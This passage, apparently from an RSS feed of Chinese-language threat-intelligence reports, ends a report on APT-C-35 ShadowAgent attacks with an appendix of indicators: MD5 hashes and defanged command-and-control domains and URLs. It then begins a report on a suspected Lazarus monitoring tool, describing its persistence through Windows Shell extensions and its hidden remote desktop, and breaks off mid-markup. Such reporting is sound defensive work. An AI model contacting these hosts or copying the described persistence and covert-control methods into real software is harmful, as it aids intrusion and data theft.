YaHei&#34;, Arial, sans-serif;"><span leaf="">APT-C-35（肚脑虫）组织从2016年被披露后，从未停止相关攻击活动，并且有越来越活跃的趋势。本次针对巴基斯坦的攻击活动中，其使用的ShadowAgent木马将文件图标进行伪装并诱使用户点击，从而开展一系列的恶意行为，可见，该组织在持续优化攻击技术的同时，也在不断丰富其攻击武器库，以应对日益完善的网络安全防护措施。</span></span></span></span></p><p style="text-indent: 2em;"><span style="color: rgb(51, 51, 51);font-size: 17px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;color: rgb(51, 51, 51);letter-spacing: 1.5px;text-indent: 28px;background-color: rgb(242, 242, 242);"><span style="font-size: 17px;letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">在此提醒广大用户，请务必保持警惕加强网络安全意识，切勿点击陌生链接或运行来源不明的文件。以此降低被网络攻击的风险。</span></span></span></span></p></div></div></div></div></div></div></div></div><div data-role="outer" label="edit by 135editor"><div data-role="outer" label="Powered by 135editor.com"><div data-role="outer" label="Powered by 135editor.com"><div data-role="outer"><div data-role="paragraph" data-pm-slice="3 6 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><div data-role="outer" label="edit by 135editor"><div data-role="title" data-tools="135编辑器" data-id="85638"><div style="margin-top: 2em;margin-right: auto;margin-left: auto;padding-top: 0.5em;padding-bottom: 0.5em;border-right: none;border-bottom: none;border-left: none;border-top: 1px solid rgb(204, 204, 204);font-size: 1em;font-weight: inherit;text-decoration: inherit;color: rgb(166, 166, 166);font-family: inherit;"><p style="margin-top: -1.2em;text-align: center;border-width: initial;border-style: none;border-color: initial;line-height: 1.4;"><span style="font-size: 16px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong><span style="font-size: 16px;background-color: rgb(15, 15, 25);border-color: rgb(183, 184, 184);color: rgb(255, 255, 255);padding: 8px 23px;text-decoration: inherit;"><span leaf="">附录 IOC</span></span></strong></span></p></div></div><div data-role="paragraph" style="margin-top: 24px;margin-bottom: 24px;"><p style="margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span style="color: rgb(0, 0, 0);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong><span style="color: rgb(0, 0, 0);font-size: 15px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;"><span leaf="">MD5</span></span></strong></span></p><p><span leaf=""><span textstyle="" style="font-size: 15px;">1c335be51fc637b50d41533f3bef2251</span></span></p><p><span leaf=""><span textstyle="" style="font-size: 15px;">f78fd7e4d92743ef6026de98291e8dee</span></span></p><p><span leaf=""><span textstyle="" style="font-size: 15px;">20c9ac59c444625a7ee364b410da8f11</span></span></p><p><span leaf=""><span textstyle="" style="font-size: 15px;font-weight: bold;">Domain</span></span></p><p><span leaf=""><span textstyle="" style="font-size: 15px;">brityservice[.]info</span></span></p><p><span leaf=""><span textstyle="" style="font-size: 15px;">www.mydropboxbackup[.]com</span></span></p><p><span leaf=""><span textstyle="" style="font-size: 15px;font-weight: bold;">URL</span></span></p><p><span leaf=""><span textstyle="" style="font-size: 15px;">wss://www.mydropboxbackup[.]com:443/analytics/stream?device_token=b4c08eab17da3c59</span></span></p><p><span leaf=""><span textstyle="" style="font-size: 15px;"><a href="https://brityservice[.]info:443//ZxStpliGBsfdutMawer/lkhgBrPUyXbgIlErAStyilzsh" target="_blank">https://brityservice[.]info:443//ZxStpliGBsfdutMawer/lkhgBrPUyXbgIlErAStyilzsh</a></span></span></p><p><span leaf=""><span textstyle="" style="font-size: 15px;"><a href="https://brityservice[.]info:443//ZxStpliGBsfdutMawer/lkhgBrPUyXbgIlErAStyilzsh/N1/SA" target="_blank">https://brityservice[.]info:443//ZxStpliGBsfdutMawer/lkhgBrPUyXbgIlErAStyilzsh/N1/SA</a></span></span></p></div></div></div></div><div data-role="outer" label="Powered by 135editor.com"><div data-role="outer" label="Powered by 135editor.com"><div data-tools="135编辑器" data-id="98507" style="color: rgb(51, 51, 51);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, Arial, sans-serif;"><div style="margin: 10px auto;text-align: center;line-height: 1.5em;"><div style="padding-bottom: 3px;display: flex;justify-content: center;align-items: center;border-bottom: 1px solid rgb(190, 25, 31);"><p data-brushtype="text" style="padding-right: 8px;padding-left: 8px;font-size: 16px;letter-spacing: 1.5px;transform: rotate(0deg);"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong><span leaf="">团队介绍</span></strong></span></p></div></div><p style="padding-top: 4px;padding-bottom: 4px;font-size: 12px;letter-spacing: 1.5px;line-height: 1.5em;text-align: center;transform: rotate(0deg);"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">TEAM INTRODUCTION</span></span></p></div><div data-role="paragraph" style="color: rgb(51, 51, 51);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, Arial, sans-serif;"><p style="min-height: 1em;letter-spacing: 0.544px;line-height: 1.5em;font-family: -apple-system-font, BlinkMacSystemFont, Arial, sans-serif;"><span style="color: rgb(190, 25, 31);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong><span style="font-size: 15px;color: rgb(190, 25, 31);"><span leaf="">360</span></span></strong><strong><span style="font-size: 15px;color: rgb(190, 25, 31);"><span leaf="">高级威胁研究院</span></span></strong></span></p><p style="min-height: 1em;letter-spacing: 0.544px;line-height: 1.5em;font-family: -apple-system-font, BlinkMacSystemFont, Arial, sans-serif;"><span style="color: rgb(136, 136, 136);font-size: 14px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">360高级威胁研究院是360政企安全集团的核心能力支持部门，由360资深安全专家组成，专注于高级威胁的发现、防御、处置和研究，曾在全球范围内率先捕获双杀、双星、噩梦公式等多起业界知名的0day在野攻击，独家披露多个国家级APT组织的高级行动，赢得业内外的广泛认可，为360保障国家网络安全提供有力支撑。</span></span></p></div></div></div></div></div></div><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>


<p><a href="2247507603">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=4b18c084&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzUyMjk4NzExMA%3D%3D%26mid%3D2247507603%26idx%3D1%26sn%3Daf41be456f6393a24771846328e8d7f2">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Fri, 28 Nov 2025 17:30:00 +0800</pubDate>
    </item>
    <item>
      <title>疑似APT-C-26（Lazarus）组织利用远程IT伪装部署监控程序的攻击行动分析</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzUyMjk4NzExMA==&amp;mid=2247507568&amp;idx=1&amp;sn=af3ec0ff4685722c599eefa26925c842</link>
      <description>近期，我们在调查过程中捕获到APT-C-26(Lazarus)使用的一款功能完备的定制化监控程序，具备完整的远程桌面控制能力。我们分析认为，此类行为不仅威胁企业数据安全，更可能为其的后续网络攻击行动积累战略资源。</description>
      <content:encoded><![CDATA[<p>
原创 <span>高级威胁研究院</span> <span>2025-11-21 17:31</span> <span style="display: inline-block;">北京</span>
</p>




<p><img src="https://wechat2rss.xlab.app/img-proxy/?k=1bb56668&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F6CNEHNicic4Pp1goxlUiaefg6lWwuby4CGlkU0f9u0WWkAdKTl6ibo7uXEUa705iaxZ9nMBmhHwG7HH9536KVemE9XA%2F0%3Fwx_fmt%3Djpeg"/></p>

<p>近期，我们在调查过程中捕获到APT-C-26(Lazarus)使用的一款功能完备的定制化监控程序，具备完整的远程桌面控制能力。我们分析认为，此类行为不仅威胁企业数据安全，更可能为其的后续网络攻击行动积累战略资源。</p>

<div data-role="outer" label="edit by 135editor"><div data-role="outer" label="Powered by 135editor.com" data-pm-slice="11 8 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><div data-tools="135编辑器" data-id="102539"><div style="margin: 10px auto;text-align: left;"><div style="background: #f2f2f2;"><div style="padding: 1em;"><div style="display: flex;justify-content:  space-between;align-items: flex-end;" hm_fix="312:231"><div style="display: flex;justify-content: space-between;flex-direction: column;align-items: flex-start;border-left: 4px solid rgb(190, 25, 31);"><p data-brushtype="text" style="font-size: 16px;letter-spacing: 1.5px;padding-right: 0em;padding-bottom: 3px;padding-left: 0em;color: rgb(50, 40, 40);margin-left: 12px;border-bottom: 1px solid rgb(190, 25, 31);font-style: italic;"><span style="font-size: 18px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong><span leaf="">APT-C-26</span></strong></span></p><p data-brushtype="text" style="letter-spacing: 1.5px;padding-top: 4px;padding-right: 0em;padding-left: 0em;color: rgb(190, 25, 31);font-style: italic;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 18px;"><strong><span leaf="">Lazarus</span></strong></span></span></p></div></div><div data-autoskip="1" style="text-align: justify;line-height:1.75em;letter-spacing: 1.5px;font-size:14px;color:#000;margin-top: 20px;"><p style="text-align: justify;vertical-align: inherit;color: rgb(51, 51, 51);text-indent: 28px;font-family: 等线;margin-top: 8px;margin-bottom: 8px;line-height: 1.6em;"><span style="line-height: 18.4px;font-size: 17px;color: rgb(33, 33, 34);letter-spacing: 1.5px;text-indent: 28px;background-color: rgb(245, 245, 244);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="line-height: 18.4px;font-size: 17px;color: rgb(33, 33, 34);letter-spacing: 1.5px;text-indent: 28px;background-color: rgb(245, 245, 244);"><span leaf="">APT-C-26（Lazarus）组织是一个高度活跃的APT组织。该组织除了对金融机构和加密货币交易所感兴趣外，也对全球的政府机构、航空航天、军工等不同行业开展攻击活动，主要目的是获取资金和窃取敏感信息等。其攻击方式主要包括网络钓鱼、网络攻击和勒索软件攻击，并且它们的攻击行为具有高度的技术复杂性和隐蔽性，也具备Windows、Linux、MacOS系统攻击能力，以及拥有多种攻击载荷武器。</span></span></span></p></div></div></div></div></div><div data-role="paragraph" style="margin-top: 24px;margin-bottom: 24px;letter-spacing: 0.578px;"><p style="margin-top: 24px;margin-bottom: 24px;letter-spacing: 0.578px;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="background-color: rgb(190, 25, 31);font-size: 18px;"><strong><span style="background-color: rgb(190, 25, 31);line-height: 43.38px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;color: rgb(255, 255, 255);"><span leaf=""> 一、概述 </span></span></strong></span></span></p></div></div></div><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 2em;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-indent: 37.3333px;text-wrap: wrap;"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;paragraph&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-top: 24px;margin-bottom: 24px;text-indent: 2em;line-height: 1.6em;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-size: 17px;letter-spacing: 0.578px;text-indent: 37.3333px;text-wrap: wrap;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]">近期，我们在追踪该组织的过程中捕获到该组织使用的一款功能完备的定制化监控程序，具备完整的远程桌面控制能力。我们分析认为，该组织中这些被派遣的远程IT人员在成功入职目标企业后，极有可能利用此类监控工具，在不触发警报的前提下，对所在企业的敏感数据进行隐蔽窃密。此类行为不仅威胁企业数据安全，更可能为该组织的后续网络攻击行动积累战略资源。</span></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;letter-spacing: 0.578px;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="background-color: rgb(190, 25, 31);font-size: 18px;"><strong><span style="background-color: rgb(190, 25, 31);line-height: 43.38px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;color: rgb(255, 255, 255);"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;,&#34;data-pm-slice&#34;:&#34;11 8 [\&#34;para\&#34;,{\&#34;tagName\&#34;:\&#34;section\&#34;,\&#34;attributes\&#34;:{\&#34;data-role\&#34;:\&#34;outer\&#34;,\&#34;label\&#34;:\&#34;edit by 135editor\&#34;},\&#34;namespaceURI\&#34;:\&#34;http://www.w3.org/1999/xhtml\&#34;}]&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;paragraph&#34;,&#34;style&#34;:&#34;margin-top: 24px; margin-bottom: 24px; letter-spacing: 0.578px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-top: 24px; margin-bottom: 24px; letter-spacing: 0.578px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;background-color: rgb(190, 25, 31); font-size: 18px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;strong&#34;,&#34;attributes&#34;:{},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;background-color: rgb(190, 25, 31); line-height: 43.38px; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; font-variant-position: normal; color: rgb(255, 255, 255);&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"> 二、攻击活动分析 </span></span></strong></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;line-height: 1.6em;text-indent: 0em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong style="color: rgb(190, 25, 31);font-size: var(--articleFontsize);letter-spacing: 0.034em;"><span style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;paragraph&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-top: 24px;margin-bottom: 24px;line-height: 1.6em;text-indent: 0em;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;strong&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;color: rgb(190, 25, 31);font-size: var(--articleFontsize);letter-spacing: 0.034em;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]">1. 攻击流程分析</span></span></strong></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">我们在追踪该组织的过程中捕获到该组织使用的一款功能完备的定制化监控程序。</span><span leaf="">该软件进一步解压并部署一个守护进程及负责核心监控功能的DLL文件。通过利用Windows Shell扩展机制，该恶意程序实现自启动与持久化驻留，确保在系统重启后仍可隐蔽运行。最终，该组件协同工作，构建起一个隐蔽的远程桌面环境，为攻击者提供对受控主机的持续监视与控制能力。</span></span></p><p><span leaf=""><img class="rich_pages wxw-img" data-imgfileid="100023876" data-ratio="0.7549132947976879" data-w="865" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=10066bdc&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4Pp1goxlUiaefg6lWwuby4CGlorpQFThicjaW0QxpC127X0oHsuwibJMBibfZ8Qy42GV5M8qjG2L7YMFHQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p style="text-align: center;"><span leaf=""><span textstyle="" style="font-size: 14px;font-weight: bold;">图 1 攻击流程图</span></span></p><p style="margin-top: 24px;margin-bottom: 24px;line-height: 1.6em;text-indent: 0em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong style="color: rgb(190, 25, 31);font-size: var(--articleFontsize);letter-spacing: 0.034em;"><span style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;paragraph&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-top: 24px;margin-bottom: 24px;line-height: 1.6em;text-indent: 0em;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;strong&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;color: rgb(190, 25, 31);font-size: var(--articleFontsize);letter-spacing: 0.034em;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]">2. 攻击组件分析</span></span></strong></span></p><p style="margin-bottom: 24px;margin-top: 24px;"><span style="color: rgb(0, 0, 0);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong><span style="color: rgb(0, 0, 0);font-size: 17px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-bottom: 24px;margin-top: 24px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;color: rgb(0, 0, 0);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;strong&#34;,&#34;attributes&#34;:{},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;color: rgb(0, 0, 0);font-size: 17px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: 